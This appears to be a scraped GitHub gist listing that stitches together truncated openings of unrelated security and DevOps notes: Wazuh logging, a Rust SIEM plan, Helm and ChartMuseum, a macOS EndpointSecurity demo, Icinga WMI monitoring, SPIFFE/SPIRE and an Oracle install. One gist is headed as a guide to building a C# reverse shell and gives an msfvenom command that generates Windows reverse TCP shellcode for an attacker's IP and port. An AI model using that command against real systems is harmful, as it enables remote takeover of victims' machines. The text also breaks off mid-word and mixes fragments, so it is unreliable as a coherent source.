Anubhav Gain anubhavg-icpl
osquery-wazuh.sh.x.c
# GNU/Linux Resource List
##### Shells
✅ <a href="https://www.gnu.org/software/bash/"><b>GNU Bash</b></a> - an sh-compatible shell that incorporates useful features from the Korn shell (ksh) and the C shell (csh).<br>
✅ <a href="https://www.zsh.org/"><b>Zsh</b></a> - a shell designed for interactive use that is also a powerful scripting language.<br>
✅ <a href="https://tcl-lang.org/"><b>tclsh</b></a> - the cross-platform Tcl shell, suitable for a wide range of scripting and automation uses.<br>
✅ <a href="https://github.com/Bash-it/bash-it"><b>bash-it</b></a> - a framework for using, developing and maintaining shell scripts and custom commands.<br>

Wazuh Agent Logging Capabilities: Comprehensive Technical Analysis

Wazuh agents provide enterprise-grade, multi-platform security monitoring with sophisticated log collection, parsing, and forwarding capabilities designed for XDR/OXDR platforms. This analysis reveals that Wazuh employs a modular architecture capable of processing 50,000+ events per second while maintaining minimal system overhead (35MB RAM average) and AES-256 encrypted communications. The platform's open-source nature, combined with extensive SIEM integration capabilities and MITRE ATT&CK framework alignment, positions it as a viable alternative to commercial endpoint detection solutions.

Agent architecture and core logging framework

Wazuh implements a distributed, modular agent architecture where specialized daemons handle distinct security monitoring functions. The core logging subsystem centers around the wazuh-logcollector daemon, which operates through multiple collection engines supporting diverse log formats and sour

Cross-Platform Rust-Based SIEM Platform Implementation Plan

A comprehensive security monitoring solution leveraging Rust's memory safety and performance for enterprise-grade threat detection across Windows, macOS, and Linux environments.

🎯 Executive Summary

This plan outlines the development and deployment of a next-generation Security Information and Event Management (SIEM) platform built on Rust-based technologies. The solution provides unified threat detection, incident response, and forensic analysis capabilities across heterogeneous environments while maintaining security-by-design principles.

Key Differentiators:

  • Memory Safety: 68% reduction in security vulnerabilities compared to C/C++ implementations

Complete Guide: Setting Up and Publishing Helm Charts to ChartMuseum

1. Setting Up ChartMuseum

Install ChartMuseum in Kubernetes

```bash
# Add ChartMuseum's Helm repo
helm repo add chartmuseum https://chartmuseum.github.io/charts

# Install ChartMuseum with API enabled for uploads
```

🛠️ Step-by-Step Guide to Creating a C# Reverse Shell

1. Generate Shellcode with msfvenom

Use msfvenom to create shellcode for a reverse TCP shell. Replace YOUR_IP with your attacker's IP address and YOUR_PORT with the desired port number:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f csharp
anubhavg-icpl / EndpointSecurityDemo.m
Created April 23, 2025 10:10 — forked from Omar-Ikram/EndpointSecurityDemo.m
A demo of using Apple's EndpointSecurity framework - tested on macOS Monterey 12.2.1 (21D62)
```objectivec
//
// main.m
// EndpointSecurityDemo
//
// Created by Omar Ikram on 17/06/2019 - macOS Catalina 10.15 Beta 1 (19A471t)
// Updated by Omar Ikram on 15/08/2019 - macOS Catalina 10.15 Beta 5 (19A526h)
// Updated by Omar Ikram on 01/12/2019 - macOS Catalina 10.15 (19A583)
// Updated by Omar Ikram on 31/01/2021 - macOS Big Sur 11.1 (20C69)
// Updated by Omar Ikram on 07/05/2021 - macOS Big Sur 11.3.1 (20E241)
// Updated by Omar Ikram on 04/07/2021 - macOS Monterey 12 Beta 2 (21A5268h)
```

https://community.icinga.com/t/monitoring-windows-remotely-through-wmi/2007

Below is an example document that explains how to set up and use remote Windows monitoring through WMI with Icinga. You can adjust paths, usernames, and parameters as needed for your environment.


Monitoring Windows Remotely via WMI with Icinga

This guide details how to monitor Windows machines without installing an agent by leveraging the Windows Management Instrumentation (WMI) layer. It focuses on using the check_wmi_plus plugin with Icinga, along with the WMIC client on Linux. Although other methods (e.g. PowerShell, SSH, SNMP) exist, this guide covers the WMI solution primarily for legacy environments (Windows Server 2012 and later).

Here’s a merged and bullet-point version that combines the steps for setting up SPIFFE and SPIRE with additional requirements like Cilium, private DNS, and mutual TLS (mTLS) without Kubernetes:

  1. Set Up Cilium on Linux VMs for Service Mesh
  • Install Cilium on each VM for managing service-to-service networking.
  • Configure Cilium to run in standalone mode (without Kubernetes).
  • Enable Cilium's service mesh features, including layer 7 (L7) policies, which will be integrated with SPIFFE identities later.
  2. Install and Configure Private DNS
  • Choose and install CoreDNS or dnsmasq on a central VM to handle internal DNS resolution for your cluster.
  • Configure the private DNS server to resolve internal services with domain names like service1.internal.cluster.local.

Based on the documentation, I'll help guide you through installing Oracle Database Free on Oracle Linux 9. Here are the steps:

  1. First, log in as the root user.

  2. Install the Oracle Database Preinstallation RPM:

```bash
dnf -y install oracle-database-preinstall-23ai
```

  3. Go to the Oracle Database Free software download page: